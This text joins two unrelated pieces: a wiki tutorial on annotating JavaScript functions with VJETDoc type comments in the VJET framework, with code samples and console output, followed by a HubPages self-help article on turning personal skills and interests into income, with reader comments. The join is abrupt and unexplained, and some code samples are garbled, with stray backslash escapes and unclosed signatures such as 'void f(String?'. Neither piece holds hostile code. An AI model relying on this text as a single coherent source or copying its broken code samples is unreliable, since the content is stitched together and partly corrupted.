//> void dateProvider( (void f(Date)) needsAdate) function dateProvider(needsAdate) { needsAdate(new Date) ; } //> void sayDateDay(Date date) function sayDateDay(date) { var day = date.getDay() ; vjo.sysout.println(day) ; } var sayDateDay2 = sayDateDay ; //< void sayDate(Date date) // we will now call dateProvider with: // 1. Our declared function sayDate // 2. Our function assigned to a local variable sayDate2 // 3. A function expression using keywork function // 4. A function expression using the Function constructor dateProvider(sayDateDay) ; // declared function dateProvider(sayDateDay2) ;// function from local variable dateProvider( // function expression from function keyword //> void function(Date date) function(date){ var day = date.getDay() ; vjo.sysout.println(day) ; } ); dateProvider( // function expression from Function constructor //> void function(Date date) new Function( 'date', 'var day = date.getDay() ; vjo.sysout.println(day) ;') );
console>
2.0
2.0
2.0
2.0
A function returning a function
We can type the return type of a function with VJETDoc.
/*> (boolean f(int)) maxer(int max) ; * Our function generator will return a function that will return * true if the passed in value is greater than max, else returns false */ function maxer(max) \{ //> boolean f(int) ; this is the function we return function f(value) { var mymax = max ; //< int return value > mymax ; \} return f; \} var out = vjo.sysout.println ; var mymaxer10 = maxer(10) ; //< boolean f(int) out(mymaxer10(9)) ; // should be false, 9 < 10 out(mymaxer10(11)) ; // should be true, 11 > 10
console>
false
true
Typing a function in an Object Literal
A function can be assigned to the member name in an Object Literal. Since the member name is the actual function name, we use the function expression syntax.
var contract = { rate: 22.45, //< Number location: 'Boston', //< String open: true, //< boolean //> boolean isCostly() isCostly: function(){ return this.rate > 30.00 ; } } var costly = contract.isCostly() ; //< boolean var out = vjo.sysout.println ; out(costly) ; // false. rate is < 30.00 contract.rate = 58.70 ; out(contract.isCostly()) ; // true. rate is > 30.00
console>
false
true
Function Assignment
We saw where we declared a function and assigned it to a local variable in a single statement. This was a convenience Vjet supports (kind of a 2-for-1) declaration; you get to declare the function and variable in one shot. We can however, declare a variable (local or global) and in another statement assign it a function.
var max ; //< Number max(Number a, Number b) function f(a, b) { //< Number max(Number, Number) return (a > b) ? a : b ; } max = f ; // should be ok since function signatures are compatible var out = vjo.sysout.println ; out(f(10, 20)) ; out(max(10, 20)) ;
console>
20.0
20.0
Note that we should be able to use the force-cast VJETDoc style to help us reduce the amount of physical typing we do. We could define the function first, which gives us a better type blueprint to verify against. We can then simply say the variable, max, is that type. The example following shows this approach.
//> Number f(Number, Number) function f(a, b) { return (a > b) ? a : b ; }; var max ; //<< ; we don't need to retype the type comment var out = vjo.sysout.println ; out(f(10, 20)) ; out(max(10, 20)) ;
console>
20.0
20.0
Functions and Globals
Just as we were able to assign a function expression to a local variable, we use the exact same VJETDoc syntax when assigning to a global variable.
Optional Arguments
An optional argument means it can be omitted. The syntax for identifying optional arguments: Type-Name "?" (the type name followed by a question mark) Examples of the optional argument w/type are: Date?, int?, String[]? An optional argument can appear in any poisiont argument declaration. However, once an optional argument is defined a few rules must be followed:
- Any subsequent arguments must also be optional
- A special case of the last argument being a variable-argument is allowed
All of the following are valid declarations using optional arguments:
//> void f(int?) //> void f(int, String?) //> void f(int, String, Date?, Date?) //> void f(int?, String?) //> void f(int?, String...) //> void f(int, String?, Date...)
The following are examples of invalid declarations using optional arguments. The issues will be with optional args must be consecutive and a consecutive set of optional args can have the last argument being var-args:
//> void f(int?, String) //> void f(int, String?, Date) //> void f(int?, String..., Date?)
A key to understanding arguments in general is to think that each argument is a column. Each column has a type. In the case of var-args, you can think of a never-ending set of columns each with the type. The notion of final applies to the argument declaration. If the final is on a var-args then all of those columns will be final. The final qualifier does not change any of the previously mentioned ways the arguments are declared. Let's go through some examples to see exactly what a given signature actually means. One technique is to flatten out the signature so that each permutation is directly expressed with its own comment. When doing this flattening, we need to understand how to expand a given argument.
//> void f() ; no interpretation necessary f() ; f(1) ; // error since f() takes no arguments //> void f(int, String) f(0) ; // error since f() takes 2 arguments f(1) ; // error since f() takes 2 arguments f(1, 'hello') ; // ok, 2 args and they are compatible types f(1, 'hello', 2) ; // error since f() takes 2 arguments //> void f(int?) f() ; // ok since we handle 0 args f(1) ; // ok since if we have 1 arg, it must be an int f(1, 2) ; // error since f() can take 0-1 arguments //> void f(int?, String)
This signature is invalid. If we have an optional argument, any following arguments must be also optional, or end with a var-args.
//> void f(int?, String?) f() ; // ok f(1) ; // ok f('abc') ; // error - we must have concrete previous optional args f(1, 'abc') ; // ok f(1, 'abc', 2); // error - function takes at most 2 arguments //> void f(int, String?) f() ; // error - f() takes 1 or 2 arguments f(1) ; // ok f(1, 'abc') ; // ok f('abc') ; // error - String not compatible with int f(1, 'abc', 2); // error - f() takes 1 or 2 argument
Let's take a simple optional-args declaration and flatten its permutations out into a series of equivalent VJETDocs. The ability to have more than 1 VJETDoc per function is called overloading, is supported by Vjet and is described later in this document.
//> void f(String?
is the same as
//> void f() //> void(String) //> void f(int, String?)
is the same as
//> void f(int) //> void f(int, String) //> void f(int?, String?)
is the same as
//> void f() //> void f(int) //> void f(int, String)
Variable Arguments
JavaScript naturally supports variable arguments. The full set of arguments is always available via the built-in variable, "arguments". Thus a JavaScript programmer will then look at the number of arguments (and often use the typeof or instanceof operators) on the arguments to determine how to process the varying amount coming in. From a typing standpoint, we want to identify that a variable number of arguments is possible and what type they should be. The syntax for identifying variable arguments is: Type-Name "..." (the type name followed by 3 dots) ex: Date..., int..., String[]... etc... If variable arguments are specified a few rules apply:
- There must be only one in a given function signature
- Must be the last position of the set of arguments
- It is possible to have just variable arguments and no preceding arguments
void f(Number...) void f(Number... ids) void f(boolean, Number...) void f(boolean ok, Number... ids)
examples of incorrect variable arguments:
void f(Number..., int) - variable arguments must be in last position void f(Number..., Date...) - only one variable arguments per declaration void f(Number..., Date?) - variable arguments must be in last position
We follow with some variable arguments declarations with sample of valid and invalid JavaScript statements using that function.
//> f(int...) f() ; // ok f(1) ; // ok f(1, 2, 3) ; // ok f(1, 2, 'abc) ; // error - 'abc' is not an int //> f(String..., int)
Signature is invalid. If we have var-args, it must be the last declaration.
//> f(int, String...) f() ; // error - f() takes 1 or more arguments f(1) ; // ok f(1, 'abc') ; // ok f(1, 'abc', 'jdk') ; // ok f('abc', 'jdk') ; // error - first argument must be int f(1, 'abc', 2) ; // error - int (2) is not compatible with String //> f(int?, String...) f() ; // ok f(1) ; // ok f('abc') ; // error first arg, if any must be int f(1, 'abc') ; // ok f(1, 'abc', 'xyz') ; // ok f(1, 'abc', 2) ; // error - int (2) is not compatible with String
ll of the following are valid combinations of fixed-args, optional-args and var-args:
//> void f() //> void f(int) //> void f(int, String) //> void f(int?) //> void f(int?, String?) //> void f(int, String?) //> void f(int, String, Date?) //> void f(int...) //> void f(int, String...) //> void f(int, String?, Date...) //> void f(int?, String?, Date...)
Multi-type Arguments
VJETDoc syntax supports the notion of a single argument having more than one valid type. This can be expressed in an overload as such:
//> void f(int) //> void f(String
We see that the first argument can be an int or String. We can also declare this scenario as:
//> void f({int|String})
We allow for this syntax to enable the easier typing of functions that often vary by one argument but have multiple arguments after them. Also, existing libraries such as Dojo have many functions related to DOM processing that nearly always take a Node or String type. We can cut down on the amount of physical typing and space required to declare such functions. A multi-type argument is always a physical position in the signature and in the cases with rules regarding optional-args and variable-args is the same as if the argument only supported one type. The following are example of illegal VJETDoc regarding multi-type arguments, optional-arguments and variable-arguments.
//> void f(String..., {int | boolean
//> void f(int?, {int | boolean}
optional arg must be followed by another optional arg or end with a variable-args
Relationship of physical function declaration and VJETDocs
JavaScript always has the internal built-in arguments available for a function to access. Thus, not all functions that really take arguments formally declare them. What set of arguments a function can really handle is based on its internal implementation and not necessarily the arguments in the function(...) portion of the declaration. If this is so, then should VJETDoc about functions require the physical functions number of arguments to match? The answer is no. The following example shows how two functions with the same Vjet signature have differing number of arguments in their physical declaration but have exactly the same behavior.
//> Number sumTwo(Number, Number) function sumTwo(){ var total = 0 ; // we use internal built-in variable arguments if (arguments[0]) total += arguments[0] ; if (arguments[1]) total += arguments[1] ; return total ; } //> Number sum(Number a, Number b) function sum(a, b){ var total = 0 ; // we use the formal arguments from the function declaration if (a) total += a ; if (b) total += b ; return total ; } var out = vjo.sysout.println ; out(sumTwo()) ; out(sumTwo(1)) ; out(sumTwo(1, 2)) ; out(sumTwo(1, 2, 3)) ; // third arg is ignored out('-------------') ; out(sum()) ; out(sum(1)) ; out(sum(1, 2)) ; out(sum(1, 2, 3)) ; // third arg is ignored
console>
0.0
1.0
3.0
3.0
0.0
1.0
3.0
3.0
Also, a function that is declared as vjo.NEEDSIMPL never defines any arguments, yet you can declare the argument(s) types in the VJETDoc . vjo.NEEDSIMPL is a placeholder value when declaring an abstract Vjet type function. Abstract types/functions are described in another document. Suffice to say that the placeholder function does not have any arguments.
vjo.ctype('Ex') .protos({ add: vjo.NEEDS''IMPL, //< Number add(Number, Number) sum: vjo.NEEDS''IMPL //< Number add(Number...) }) .endType();
Can a physical function declaration, define more arguments than are in the VJETDoc? Yes. Arguments beyond those declared in the comment are given the type Object.
vjo.ctype('abc.Ax5') //< public .props( { //>public void main(String... args) main : function(args){} //> void f(int) function f(a, b, c) { a++ } } }) .protos({ }) .endType();
Overloaded Functions
In Object Oriented programming, there is a concept called overloading. Without delving into why this is a good idea, let's say that Vjet allows you to define more than one VJETDoc to describe your function. As we saw with optional-args and var-args, you get a similar effect; more than 1 type signature is behinds the scenes in use for a single function. By allowing more than 1 VJETDoc per function, we can do similar declarations. The following function f() is overloaded with 3 function signatures. Function g(), has only 1 function signature, but handles the exact same argument combinations that f() does. If this is so, then why have overloading? Well, it turns out that there are combinations of arguments that we could not be able to describe with optional-args and/or var-args.
//> void f() //> void f(int) //> void f(int, String) function f() { } //> void g(int?, String?) function g() {
The following overloaded function shows that not only can we have differing argument combinations but that we also can have differing return types.
//> Number add(Number, Number) //> String add(String, String) function add(a, b){ return a + b ; }
add(10, 20) ; add('cat', 'bird') ;
Note that having more than 1 VJETDoc per function does not produce a permutation of argument types at each position. Each signature is evaluated itself for completeness and does not impact any other signatures that are present. In our last example we would not allow the following:
add(10, 'cat') ; add('cat', 10) ;
It's possible to have overloads where some signatures return a type and others don't (they return void)
More on function signatures
We can have cases where a function may or not return something based on what arguments it takes. When we have these conditions, it is not possible for Vjet to determine if you have properly coded your function implementation to honor such permutations. It will however, verify that if you do have a return, it will not violate the known return types (the function could be overloaded). In the following example, the return new Date, would be an error since the return types for f() are either int or String.
//> int f(boolean)//> String f(String) function f(a) \{ if (typeof a == 'boolean') return 10 ; // ok from int f(boolean) if (typeof a == 'string') return 'xxx' ; // ok from String f(String) return new Date ; // should fail since neither int or String }
Access Control with Overloading
You must have the same access control with all of your overloaded signatures. The following are examples of overloading and having the same access control:
//> public void f() //> public void f(int, String) function f() { ... } //> private int f() //> private void f(Number) function f() {... }
The following are examples of illegal overloading due to mismatched access control. Note that having no access control means all of your overload signatures must also have no access control:
//> void f() //> public void f(String) function f() { ... } //> public int f() //> private String f(Number) function f() { ... }
Return types ambiguous for same args
When you are defining your overloads, you should be thinking that each signature is unique. Thus when calling the function for a given set of arguments that match that signature you get the return type associated with that signature.
We have seen that with optional arguments and/or variable-arguments, we get an implied overload. Thus a single signature can really expand to multiple signatures behind the scenes. Because of this you need to make sure that at the single declaration level you remain unique.
Here are some example where you get ambiguous bindings:
//> void f(int) //> String f(int?
We can see that String f(int?) is really the same asString f() String f(int)
Since we already have a signature for f(int) saying it should return void, we now have a collision. | http://wiki.eclipse.org/index.php?title=VJET/Typing_Functions_with_VJETDoc&diff=323827&oldid=323429 | CC-MAIN-2019-43 | refinedweb | 3,824 | 54.73 |
CGTalk
>
Software Specific Forums
>
Autodesk Maya
>
Maya Rendering
> Render bones?
PDA
View Full Version :
Render bones?
zoharl
01-05-2012, 10:32 AM
The script from creativeCrash that places elongated pyramids on top of the bones isn't good enough. Any creative idea for something that looks good, besides using the hardware render buffer?
hanskloss
01-06-2012, 07:05 PM
I was looking for a solution to this for the longest time. Not sure why they decided not to make bones a renderable object. Pretty lame if you ask me. :rolleyes:
zoharl
01-06-2012, 09:23 PM
The situation is that bad, ah?
Well wait a minute, I'm looking at the bones in the view port, and what's the problem to draw them one-to-one with all the colors and stuff (bit by bit, I'll rewrite maya ... ;) )?
How about making it even better, such as putting real bones (not real-real, real - graphics real...) exactly on top of them? It should be a blast. But surely someone must have done such a thing already?
thematt
01-06-2012, 09:39 PM
would viewport 2.0 render them? it render camera for exemple from what I saw.
Clappy3D
01-06-2012, 09:39 PM
I think your plugin Maya business will be a smashing success. Now get to work.
hanskloss
01-07-2012, 12:01 AM
It's been done before in Mirai. Bones in Mirai were built off of polygonal primitives thus were renderable. It amazes me how many people are asking for features/tools that have been around for years, but...not in Maya. I truly wish ADSK would have taken the time to do a real in depth analysis of this application.
zoharl
01-07-2012, 12:30 AM
This is getting ridicules!
Well here is my create_bones.py
Put the bone.ma
in the script dir, or create your own model named bone inside the scene. Select a joint and run:
import create_bones
reload(create_bones)
create_bones.do()
It would create bones for the joints and bind them:
I'm opened to suggestions (hierarchy colors?), or better bone.ma.
cgbeast14
01-20-2012, 11:49 PM
whipped this up for you to try out.
current working code [MEL]
/*usage select root joint and run script*/
//select all children of parent
string $rootJoint[] = `ls -sl -fl`;
select -hi;
string $sel[] = `ls -sl -fl`;
string $cpm = `createNode closestPointOnMesh`;
select -cl;
group -em -n "skelGeo";
for ($i=0; $i<size($sel); $i++){
//Evaluate for joints only
if (`nodeType $sel[$i]` == "joint"){
//create sphere at each joint
vector $pos = `xform -q -ws -t $sel[$i]`;
vector $rot = `xform -q -ro $sel[$i]`;
polySphere -sx 10 -sy 10 -n ($sel[$i]+"_geo");
float $jointScale = `jointDisplayScale -q`;
float $radius = `getAttr ($sel[$i]+".radius")`;
$radius = ($radius/2)*$jointScale;
xform -ws -t ($pos.x) ($pos.y) ($pos.z) -ro ($rot.x) ($rot.y) ($rot.z) -scale $radius $radius $radius ($sel[$i]+"_geo");
makeIdentity -apply true -t 1 -r 1 -s 1 -n 0 ($sel[$i]+"_geo");
if ($sel[$i] != $rootJoint[0]){
//create lengths to connect child nodes
string $fParent = firstParentOf($sel[$i]);
float $jointScale = `jointDisplayScale -q`;
float $radius = `getAttr ($fParent+".radius")`;
$radius = ($radius/2)*$jointScale;
$cone = `polyCone -sx 4 -h 2 -n ($fParent+"_geo_length")`;
move -r -y (2);
makeIdentity -apply true -t 1 -r 1 -s 1 -n 0 $cone;
ResetTransformations;
//get Position of Parent
vector $pos = `xform -q -ws -t $fParent`;
float $radius = `getAttr ($fParent+".radius")`;
xform -ws -t ($pos.x) ($pos.y) ($pos.z) -scale $radius $radius $radius ($cone);
select -r $sel[$i];
select -add $cone;
aimConstraint -offset 0 0 0 -weight 1 -aimVector 0 1 0 -upVector 0 1 0 -worldUpType "scene";
select -r ($sel[$i]+"_geo");
string $shapeNode[] = `ls -sl -dag -lf`;
connectAttr -f ($shapeNode[0]+".outMesh") ($cpm+".inMesh");
vector $pos = `xform -q -ws -t ($cone[0]+".vtx[4]")`;
setAttr ($cpm+".inPositionX")($pos.x);
setAttr ($cpm+".inPositionY")($pos.y);
setAttr ($cpm+".inPositionZ")($pos.z);
vector $pt = getAttr ($cpm+".position");
xform -ws -t ($pt.x) ($pt.y) ($pt.z) ($cone[0]+".vtx[4]");
select -r -hi $cone;
DeleteConstraints;
parent $cone (shortNameOf($fParent)+"_geo");
}
}
}
//clean up nodes
delete $cpm;
for ($i=0; $i<size($sel);$i++){
parent ($sel[$i]+"_geo") "skelGeo";
select -r $sel[$i];
select -add ($sel[$i]+"_geo");
ParentConstraint;
}
I wasn't sure how you'd want the geometry to be organized so that's pretty flexible for changes. Did you need it actually skinned? it seems like parenting would give a better result in this particular case but I dont know what the particular needs are. Anyway I'm gonna revise some of the code and I'll be posting it to Creative Crash as "Beastly Bones" for anyone whos interested
[edit] I decided to update it to set up a parent constraint from the bone to geometry so you can try it out and see if that works for your needs. Also I corrected a parenting issue for the 'length' geometry. All geo should be dumped into a group called skelGeo. Let me know how it works for you!
zoharl
01-21-2012, 05:48 AM
If you can, please show a rendered image of your skeleton, and put your code under code tags, and make indented, so it would be more readable.
cgbeast14
01-21-2012, 09:20 PM
Ok I reformatted the code and posted a render image based off a maya generated skeleton.
I caught a little oversight in there about the 'joint size' value and I've updated it in the code. Admittedly there's still a small bug in there which is adjusting the cones pivot point to replicate the exact position I'll mess with it a little later when I get some time.
hanskloss
01-22-2012, 02:35 PM
How about making the bones gray, white, blue or green? Something that would stand out even when not rendering them.
or watch some of these videos:
cgbeast14
01-25-2012, 09:02 PM
Well in the case that its not rendered, bones do have a drawing override that allows you to change the color to make them more visible. or alternatively you could also place them in a layer and apply a color to that which would change the drawing color (joints, curves, etc)
CGTalk Moderation
01-25-2012, 09:02 PM
This thread has been automatically closed as it remained inactive for 12 months. If you wish to continue the discussion, please create a new thread in the appropriate forum.
vBulletin v3.0.5, Copyright ©2000-2015, Jelsoft Enterprises Ltd. | http://forums.cgsociety.org/archive/index.php/t-1027826.html | CC-MAIN-2015-18 | refinedweb | 1,094 | 72.76 |
How to create excellent money-making plans that actually work
Do you want to make more money online, or even offline? Sure, we all do. Coming up with a method to do this in a way that works is something that a lot of people have trouble with, though. Lots of pages will claim to tell you how to make money, but usually all they're really offering is some product, service, or gimmick that will profit them, not you. That's not the purpose of this Hub.
We're going to examine how to take the question of how to make money, come up with an effective plan of action, and allow you to find ways to implement that plan. First off, let's look at the question itself. "How can I make money?" This is really just a way of re-stating the idea, "I want or need money" as a question. Or to be more precise, "I want to establish a relationship with the rest of the world in a way that causes it to give me money". This is the goal, and most people invest themselves, their effort, and their time in trying to satisfy that goal.
But when that's as far as it goes, it seldom works. Of course it doesn't. It doesn't work because when people do that, they're creating a situation where their objective is just to take away from the world, and any contribution back into the world is merely incidental, or an unavoidable necessity. That not only doesn't work - most systems don't want people taking from them without giving anything back in return - it generally results in the world becoming an even worse place, because these people are subtracting value from it. They are attempting to add value to their own lives by taking value away from the rest of the world. Most people try to do this, from the very powerful people in the world, to the people on the street who ask you for pocket change. It doesn't genuinely work (and so it's a waste of your time to do), and it makes the world a more weary, valueless place. It's also a very negative statement about yourself to make. The choice to do that is really just a way of acting on the statement, "I am a person with nothing to offer, who can only take value away from the world." And that's never true. It's an unfair statement about yourself, and can only make you miserable.
Some people, like the person on the street who begs you for pocket change, do it because they genuinely have no option. But usually, there are plenty of other, better options. Nearly always, the hard part is spotting them. This is usually because we overlook our own value - the things that we have and know and can offer or provide to others - and because we're not used to thinking carefully and creatively about the opportunities we have to offer them to others in a way that benefits ourselves and them as well.
Imagine for a moment going through the job offers in the classified ads of a newspaper. Chances are that you're not going to find many offers like, "Urgently needed - Someone to do absolutely nothing. $5,000 a month, with benefits. Must be available to start immediately." Of course you're not. You wouldn't offer someone $5,000 a month and benefits to do absolutely nothing for you, and generally neither will anyone else. Expecting someone else to give something away without ever getting any value in return for it is unrealistic.
Value is the key
Value drives the entire process. Lots of people fall in love with the idea of "making money on the internet" because they think that it's a way to get value without giving value. Sometimes it is, because a lot of systems on the internet are just starting out. They may pay value out without getting value in return. These are the systems that are working from an unrealistic model, and it's costing them. Eventually, those costs will cause them to either make a correction in their approach, or go under completely. So look at systems like that as flukes, that won't be around for very long. You could devote your life to looking for those flawed systems as they appear, finding loopholes and exploiting them before they're corrected, but then you have turned finding and exploiting loopholes like that into your full-time job. It's not only very uncertain, but as systems like that stop working - as they must - you'll have to devote more and more of your time and effort to finding new ones, and hoping that they pay out before they go under themselves.
Let's concentrate on finding value within yourself, first of all. This will allow you to find things you can offer to the world, and that the world will be willing and able to give you value in return (in the form of money) for providing.
When it comes to this Value In, Value Out transaction, lots of people tune it out. This is usually because they have been conditioned to think that when they provide something of value to the world, by definition it means that it has to be something they don't enjoy doing, or find hard, miserable, or grueling. Nothing could be further from the truth. I'm providing value to you right now by writing this, and I'm enjoying every moment of it. Personally, I find it rather addictive. But most of the world believes that providing Value Out means sacrificing something, and that in order for it to be worth a lot, it must cost them a lot. Again, this isn't true. I'm providing value by sharing my experience and thinking with you in a way that will allow you to make more money. It involves giving up some of my time to do it, but it gives me value by providing money and by allowing me to share better ways of looking at the world with others, and by doing so I'm investing myself to making the world a better place. That's very enjoyable and important to me, so I get a lot out of it. I get very frustrated at the state of the world sometimes, and so I consider this a constructive means of recreation on my part, as well as a money-making opportunity.
So let's take a look at what you can offer to the world as Value. You've been on the planet for a number of years; you must have spent that time doing something. What has it been? Try this: grab a pencil and paper, and jot down a list of things you're good at. Seriously. Stop reading for a moment, and get a pen and paper.
Finding the value you have
Okay, write the words, "Value Out" at the top of that paper. We're going to write down some of the big things you know about. Some of the things you're good at. You'll probably think of more stuff later, but this is for now. Don't worry about making them only things that you could make money doing, we'll worry about that later. What can you do? Do you know about fashion? Can you juggle? Have you read a lot? Do you watch a lot of television? What have you been doing with your time in life? Also include the things you're particularly good at. Can you write? Draw? Paint? Edit? Program? Spend at least five minutes thinking of stuff and jotting it down for your list. This will help you make more money, so I think five minutes is worth it. Don't you?
Learning what you value
Alright, now you should have your Value Out list. There are probably at least fifteen or twenty things on it, many of them with no immediate relationship to making money. Underneath your Value Out list, I want you to write Value In. This is the header for your second list, and it won't take as long. We're going to look at your life for a second and, by considering how you've been choosing to spend your time, get some ideas about what's important to you. You can use your first list as a way to get ideas about what your Interests and Motivations are, by the way. You've been there with you throughout your entire life - you should have some idea of what motivates and interests you. If you get stuck, you might want to sneak a peek at your HubPages tag cloud in your Profile area. HubPages keeps track about what you spend your time on, at least here on the site. You may also want to glance at your User Interests on any blog you have, and borrow some ideas.
Why are we doing this? Because often when people pursue money, what they're really seeking is Value. Value, in the form of money. They chase after money, they invest their whole lives into it, and they make themselves miserable in the process. This is because they're doing what gives them money, not Value, and so they're in a miserable, boring situation that only gives them money. And usually, they're not very good at it, because it's almost impossible to fully apply yourself to something that doesn't matter to you in and of itself.
We're going to get past this by looking for things you actually find Value in. Leave money completely out of it for a second. Where there is actual Value, there is always an opportunity to convert it into money, because the purpose of money is to represent value. This is why people often mistake money with value, by the way. It's really just a placeholder. So write down on your Value Out list what's important to you. (Don't write "Money", unless you're genuinely fascinated by how currency is manufactured.) Write down the things you find rewarding. Is it building a relationship with people? Helping someone to make their life better? (That's a big one for me.) Is it computer games, books, or movies? Avoid things that you would like to matter to you someday, and stick with what you've found that actually makes you happy. Are you a collector? An enthusiast? A trivia buff? What have you found that makes you happy in life? If you were independently wealthy and money didn't matter - how would you spend your time? In short, what do you find rewarding?
Alright, now you should have your Value Out list, and your Value In list. (If you don't, stop reading for a moment and finish them before moving on.) We're going to go over them, and turn them into ways to make money. First, we're going to avoid some common mistakes.
Playing matchmaker
Who would find the stuff in your Value Out list worthwhile? Who would want what you have to offer to the world? Someone must. If you can write, for example, HubPages is a great place to start. Someone out there wants to know what you already know. The less people who have that information, the more valuable it usually is. Maybe you can create your own website or blog about it. Users with common interests will find it, join up, and you'll get ad revenue. But keep thinking, and thing big. This is what you'll eventually be spending your time doing, so make it big and make it matter.
Abstracting - There's more where that came from!
We're also going to Abstract. Abstracting is the opposite of the Reducing we did above. We're going to take the Big Ideas, like Nature for example, and see if there's any other avenue of it we're missing. If you're interested in rocks, herbs, and animals, maybe you'd also be interested in ecology and marine habitats. If you are, write them down too. More items on your list will mean more opportunities to make money.
Alright, you now have a really well-evaluated list that tells you the Big Ideas about yourself. It tells what you love, and what you can do for others. Now we're going to apply it to the world, and see what kinds of opportunities we can find - or create - to trade Value that we have for money, by looking at what the world values.
Fluff - Considering what the world values
First off, most people put down "TV, movies, and games" as their interests. This is because a lot of people have no lives. By that I mean, they don't do very much with their time, and pursue those things not because they genuinely find a lot of value in them, but instead because they happen to be the closest and most easily-accessed thing around them that claims to offer them value. People, particularly people in America, don't search very hard or very far to find actual value, and have gotten used to settling for whatever's the most convenient. As a result, we have a ton of people who know a lot about The Simpsons and American Idol, but few people who know very much about anything really useful. It's true, you can find ways to make money with an extensive knowledge of Simpsons trivia - but those opportunities are few and far between, and you're more likely to spend more time and effort trying to find them then you will get back from them. So be aware that the Value most people have is usually duplicated - since it usually all comes from the same media source most of us have in common - and not only is it mostly useless, there isn't much demand for that in the world because so many people have that knowledge. We're going to call that sort of knowledge Fluff - like the part of the news when they stop telling you all the terrible things that have happened in the world today, and show you two minutes of footage about kittens playing the piano. Fun - but it doesn't usually serve much of a purpose. So as you look at your list, keep in mind which things are probably Fluff, and which are not. Fluff doesn't rule it out as a money making opportunity, but it usually means that you'll have a hard time providing it for much in return, because of Supply and Demand.
Reducing - Discovering the common denominators
Another thing we're going to do is to Reduce. When you look at your Value In and Value Out lists, look for things they have in common. If you have minerology, herbology, and zoology on your Value Out list, for example, they probably really reduce to an interest in Nature in general. Circle them, draw lines that link them together, and write Nature in the margin. Underline it, too. This is a Big Idea for you, and we're looking for Big Ideas for you in both lists. Look at the lists, and think about why you do those things. Answer the question, "I am really interested in ______ because..." and find out what kind of a need it fills in your life. What does it do for you? "I like to learn about rocks, herbs, and animals because... I get really frustrated living a cramped, modern life." Boil down some of the various things you have listed into what they have in common, and what they actually mean to you. Knowing what you're really about tells you a lot about where you should go with it. Often, people learn a lot they didn't recognize about themselves when they think about this. When you Reduce, and find out what you're really trying to achieve when you do what it is you love doing, ask yourself if there would be other ways of achieving the same thing, or even if there are much better ways of going about it. Many times, this will cause you to get a money-making idea instantly that had never occurred to you before.
Supply and Demand - Getting the most out of your value
One thing to keep in mind is Supply and Demand. Whatever your skills and interests are, someone has to want them. And how much they will be willing to pay you for them depends on how many people already know what you know, or do what you do. So to provide the most Value Out (and therefore the most money) look for things you have that the world really needs, and doesn't have a lot of people supplying. What do people need? Can you supply that in some way? By focussing on things that are hard to come by, you can zoom in on the stuff that the world will pay you the most for.
The other part of that idea is that by focussing on approaches that give back to you in ways that are important to you (the big stuff on your Value In list), you'll be zooming in on things that will matter the most to you. Usually, it's a trade-off between what you want to do and what the world would like to have done for it... but it doesn't have to be that way. Not if you think creatively about yourself, the world, and how those goals can overlap. Preferably, overlap three or four of them.
Tools - Ways to apply that value
We're almost
finished. You're thinking about what you have, what you need, what the
world will pay for, and what the world needs. We have one final thing
to consider, and that's Tools. You can have the best ideas in the
world ("I want to make money writing articles!"), but if you don't know
what Tools exist to allow you to do that, like HubPages and Helium,
you're not going to get very far with it. Sometimes, you'll know your
skills and what the world would like, but you won't find any way to
bring them together until you hear about a Tool that will do that for
you - which is what happened with me and internet article writing. I
knew I was good with English, I knew I had a lot of ideas, but I didn't
know there were sites that paid for articles. Sometimes having the
Tools can make all the difference in the world. (Tip: This makes Tools
very valuable to people, and means that there can be great opportunities
providing access to, and awareness of, Tools to people who need them.
Information swapping in terms of opportunities is a lot of what HubPages
itself does, and that's only one way to exchange your knowledge of
Tools for value.)
So we're going to look for Tools for a moment. Google is a great way to do that. Almost anything can be sold on the internet, even experience and knowledge - look at HubPages. While you're unlikely to find people looking to pay you over the internet for your ability to juggle, you may find that people will pay you for most of your Value Out items in various ways. Paid web design. Paid coding jobs. Actually, if you could juggle and were willing to invest a little money, the internet probably would pay you to juggle - as an entertainer or clown at special events. It's all a matter of thinking creatively, and using the right Tools. Definitely search Google for your interests, and maybe add "jobs" as well.
Don't get discouraged if you can't think of a great approach right away. Now that you've looked at it, boiled it down into what really matters to you, and what the world has and needs, it will percolate through the back of your mind and you'll start getting ideas over the next few days and weeks. Give it time, and keep thinking about it.
Overlapping - Getting two bites at the cherry
One last note - you can maximize what the world will pay you for by finding ways to Overlap many items in your Value Out list together - finding ways to supply your combined talents and skills in unique ways that few others will be able to compete against you to supply. That will make what you choose to do worth more, because any Demand for it will be almost impossible to fill. And by Overlapping items in your Value In list, finding things that satisfy more of them at once, and the more important ones among them, you will find opportunities that are more personally enjoyable and rewarding to you. Often, you can Overlap items from both lists into the same concept, and that's when it gets really fun. Play Mix 'n' Match with them, and see what ideas click in your head from looking at them together. Could there possibly be something out there that will pay you for your interest in Writing, your Love of Solitude, your Need for Rent-Free Living, and your desire to be Out In Nature? (Absolutely! Join the Forestry service, work as a forest-fire lookout in a remote forestry station, and upload articles to HubPages with a satellite modem.) What about getting paid for your interest in Food, People-Watching, and Website Design? (Sure thing! Create a website, become an online restaurant critic, pay users for reviews restaurants around the world and compile it into a book you can sell online, or a compilation that travel guide editors would buy from you.) Think of it as a game, a challenge to Overlap the most things in your lists. A few minutes more at the start trying to do that could ultimately spell the difference between pursuing something that makes you some money and interests you just a little bit, and doing something that makes you a lot of money and you love every moment you spend doing! Ideally, with enough thinking you'd be able to Overlap everything in both lists... but it's unlikely. But with enough thought, you can Overlap enough of the big ones that you have a great time, and are enormously successful as well. But when you're looking at your Value In list, be sure to remember that it's not just your own life that matters to you - everyone cares about the state of the world, too. Looking for options that will benefit someone else, and you, and help make the world a better place too will be much more rewarding, and as long as you're making money anyway it will be a gift you can give the world that reminds people of just what an awesome person you are. And all it takes is a few more minutes playing with approaches until you have some that satisfy you, someone else, and brings value to the world as a whole. A few minutes of Overlapping, and the world's a much better place for it.
Phone a friend
Oh - and if you're having a really tough time Overlapping an impossible-seeming set of attributes, try posting them in your Comments here, and check back to see if other readers have any ideas you may have overlooked. Group brainstorming can be tremendously powerful - you might even try asking your friends to look at your list, too....
-.
This is really excellent. I'm sorry it took me so long to read it. I looked at the title when you first posted it and thought, "oh no, not another do-nothing-and-get-rich-on-the-internet article!" But that isn't what you are saying here at all. You are right, we do have some common interests!
Hi, great hub, very enlightening. I also do internet marketing and it is very viable and alive just as you described. I can't wait to read more
Glenda
